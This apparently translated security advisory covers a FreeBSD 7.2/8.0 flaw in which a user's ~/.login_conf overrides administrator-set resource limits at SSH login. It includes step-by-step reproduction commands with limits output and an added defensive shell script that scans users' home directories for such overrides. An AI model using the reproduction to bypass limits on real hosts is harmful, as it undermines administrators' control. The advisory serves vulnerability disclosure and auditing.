Affected Versions:
FreeBSD 8.0
FreeBSD 7.2
Vulnerability description:
Bugtraq id: 42533
FreeBSD is an open-source Unix system that runs on the Intel platform and can be freely used.
The setusercontext() function in the lib/libutil/login_class.c file is used to apply user-specific settings when running with the permissions of another user. Because of this, a local user can create a specially crafted ~/.login_conf file and log in through OpenSSH to change certain restricted resource limits.
<*Reference
Andrey Zonov (andrey.zonov@gmail.com)
http://secunia.com/advisories/40923/
http://www.freebsd.org/cgi/query-pr.cgi?pr=1,141840
*>
Test method:
The program (method) provided on this site may be offensive and is intended only for security research and teaching. Use it at your own risk!
1. Add a new login class to /etc/login.conf:
test:\
	:cputime=1h:\
	:tc=default:
2. Build the database:
# cap_mkdb /etc/login.conf
3. Change the login class of the account:
# pw usermod $login -L test
4. Connect to the host over SSH as $login and execute limits-
$ limits-
Resource limits (current):
cputime              3600 secs
filesize         infinity kB
datasize           524288 kB
stacksize           65536 kB
coredumpsize     infinity kB
memoryuse        infinity kB
memorylocked     infinity kB
maxprocesses         3603
openfiles            7207
sbsize           infinity bytes
vmemoryuse       infinity kB
pseudo-terminals infinity
swapuse          infinity kB
5. Create ~/.login_conf:
me:\
	:cputime=2h:
6. Connect to the host again and execute limits-
$ limits-
Resource limits (current):
cputime              7200 secs
filesize         infinity kB
datasize           524288 kB
stacksize           65536 kB
coredumpsize     infinity kB
memoryuse        infinity kB
memorylocked     infinity kB
maxprocesses         3603
openfiles            7207
sbsize           infinity bytes
vmemoryuse       infinity kB
pseudo-terminals infinity
swapuse          infinity kB
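To check a host for the condition reproduced above, the following audit script lists every resource-limit capability set in users' ~/.login_conf files. It is an added example, not part of the original advisory or of FreeBSD's code; the capability names are the resource limits documented in login.conf(5), and the function names and the --scan flag are assumptions of this example.

```shell
#!/bin/sh
# Added audit example: flag resource-limit overrides in per-user ~/.login_conf.
# Capability names are the resource limits from login.conf(5); each may also
# carry a -cur or -max suffix.
LIMIT_CAPS='cputime|filesize|datasize|stacksize|coredumpsize|memoryuse|memorylocked|maxproc|openfiles|sbsize|vmemoryuse|pseudoterminals|swapuse'

# limit_overrides FILE
# Print each resource-limit capability set in FILE, one "name=value" per line.
limit_overrides() {
    # Drop comment lines and continuation backslashes, then split the
    # colon-separated capability fields onto their own lines.
    sed -e '/^[[:space:]]*#/d' -e 's/\\$//' "$1" |
        tr ':' '\n' |
        sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//' |
        grep -E "^(${LIMIT_CAPS})(-cur|-max)?[=#]" || true
}

# scan_homes [PASSWD_FILE]
# For every account in a passwd(5)-format file (field 1 = user, field 6 = home
# directory), report "user<TAB>file<TAB>capability" for each override found.
scan_homes() {
    while IFS=: read -r user _pw _uid _gid _gecos home _shell; do
        conf="$home/.login_conf"
        [ -f "$conf" ] || continue
        limit_overrides "$conf" | while read -r cap; do
            printf '%s\t%s\t%s\n' "$user" "$conf" "$cap"
        done
    done < "${1:-/etc/passwd}"
}

# Scan the live system only when invoked with --scan (hypothetical flag).
if [ "${1:-}" = "--scan" ]; then
    scan_homes /etc/passwd
fi
```

On an affected release, any line this prints is a limit that the account's owner, rather than the administrator's /etc/login.conf class, controls at login.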
Vendor patch:
FreeBSD
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.freebsd.org/cgi/query-pr.cgi?pr=1,141840